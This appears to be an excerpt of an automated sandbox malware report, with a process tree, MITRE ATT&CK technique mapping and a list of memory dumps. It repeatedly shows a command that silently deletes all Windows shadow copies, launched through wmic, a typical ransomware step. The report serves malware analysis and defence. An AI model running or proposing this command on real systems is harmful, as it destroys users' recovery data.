- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:204

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:580

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:600

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1748

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:968

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1572
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:1332
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1504

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1668

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1132-66-0x0000000001EA0000-0x0000000001EA5000-memory.dmp

Filesize
20KB

Download
memory/1196-69-0x000007FEFBA71000-0x000007FEFBA73000-memory.dmp

Filesize
8KB

Download
memory/1876-60-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/1876-58-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download
memory/1876-90-0x0000000003E20000-0x0000000003E21000-memory.dmp

Filesize
4KB

Download
memory/1876-61-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/1876-54-0x0000000001CD0000-0x0000000002019000-memory.dmp

Filesize
3.3MB

Download
memory/1876-55-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1876-59-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1876-63-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/1876-64-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1876-65-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/1876-62-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/1876-57-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/1876-56-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1876-67-0x0000000003D80000-0x0000000003D81000-memory.dmp

Filesize
4KB

Download